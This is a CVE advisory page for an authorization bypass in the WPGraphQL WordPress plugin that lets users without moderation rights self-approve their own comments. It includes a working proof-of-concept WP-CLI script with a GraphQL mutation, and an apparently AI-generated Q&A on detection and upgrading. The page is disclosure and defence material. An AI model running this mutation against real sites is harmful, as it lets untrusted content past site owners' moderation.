CVE-2026-33290
Received Received - Intake
Authorization Bypass in WPGraphQL updateComment Allows Self-Approval

Publication date: 2026-03-24

Last updated on: 2026-03-24

Assigner: GitHub, Inc.

Description
WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch. ### Details In WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based: - plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators. - plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability. - plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved. - plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment. - plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH). This means a non-moderator owner can submit status during update and transition moderation state. ### PoC Tested in local wp-env (Docker) with WPGraphQL 2.9.1. 1. Start environment: npm install npm run wp-env start 2. Run this PoC: ``` npm run wp-env run cli -- wp eval ' add_role("no_caps","No Caps",[]); $user_id = username_exists("poc_nocaps"); if ( ! $user_id ) { $user_id = wp_create_user("poc_nocaps","Passw0rd!","[email protected]"); } $user = get_user_by("id",$user_id); $user->set_role("no_caps"); $post_id = wp_insert_post([ "post_title" => "PoC post", "post_status" => "publish", "post_type" => "post", "comment_status" => "open", ]); $comment_id = wp_insert_comment([ "comment_post_ID" => $post_id, "comment_content" => "pending comment", "user_id" => $user_id, "comment_author" => $user->display_name, "comment_author_email" => $user->user_email, "comment_approved" => "0", ]); wp_set_current_user($user_id); $result = graphql([ "query" => "mutation U(\$id:ID!){ updateComment(input:{id:\$id,status:APPROVE}){ success comment{ databaseId status } } }", "variables" => [ "id" => (string)$comment_id ], ]); echo wp_json_encode([ "role_caps" => array_keys(array_filter((array)$user->allcaps)), "status" => $result["data"]["updateComment"]["comment"]["status"] ?? null, "db_comment_approved" => get_comment($comment_id)->comment_approved ?? null, "comment_id" => $comment_id ]); ' ``` 3. Observe result: - role_caps is empty (or no moderate_comments) - mutation returns status: APPROVE - DB value becomes comment_approved = 1 ### Impact This is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-24
Last Modified
2026-03-24
Generated
2026-05-07
AI Q&A
2026-03-24
EPSS Evaluated
2026-05-05
NVD
CVE-2026-33290
Affected Vendors & Products
Showing 2 associated CPEs
Vendor Product Version / Range
wpgraphql wpgraphql to 2.10.0 (exc)
wpgraphql wpgraphql 2.10.0
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-862 The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-33290 is an authorization bypass vulnerability in the WPGraphQL WordPress plugin versions up to 2.9.1. The flaw exists in the updateComment mutation, which allows authenticated low-privileged users, including those with custom roles that have zero capabilities, to change the moderation status of their own comments without needing the moderate_comments permission.

This means that users can self-approve their comments, bypassing the normal moderation workflows. The vulnerability arises because the authorization check is owner-based rather than field-based, allowing comment owners to update the status of their comments regardless of their moderation capabilities.

The exposed moderation states include APPROVE, HOLD, SPAM, and TRASH, and the status change is persisted directly in the WordPress comment_approved field.


How can this vulnerability impact me? :

This vulnerability allows low-privileged authenticated users to bypass comment moderation policies by self-approving their own comments.

As a result, untrusted or potentially harmful content can be published on your WordPress site without review, undermining the integrity of your comment moderation process.

The impact is an unauthorized modification of comment status, which can lead to the publication of inappropriate or malicious comments.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by testing whether low-privileged authenticated users can change the moderation status of their own comments using the WPGraphQL updateComment mutation without having the moderate_comments capability.

A proof-of-concept involves creating a user with no capabilities, posting a comment with a pending status, and then attempting to update the comment status to APPROVE via a GraphQL mutation. If the mutation succeeds and the comment status changes in the database, the vulnerability is present.

Example commands to reproduce this test in a local wp-env (Docker) environment include:

  • npm install
  • npm run wp-env start
  • Run a WP-CLI eval script that creates a no-capability user, inserts a post and a pending comment, sets the current user, and executes the updateComment GraphQL mutation to change the comment status to APPROVE.

Observing the mutation response and the database comment_approved field will confirm if the vulnerability exists.


What immediate steps should I take to mitigate this vulnerability?

The immediate mitigation step is to upgrade the WPGraphQL plugin to version 2.10.0 or later, where this vulnerability has been patched.

Version 2.10.0 includes a fix that adds a capability check for the comment update mutation, preventing unauthorized users from changing comment moderation status.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart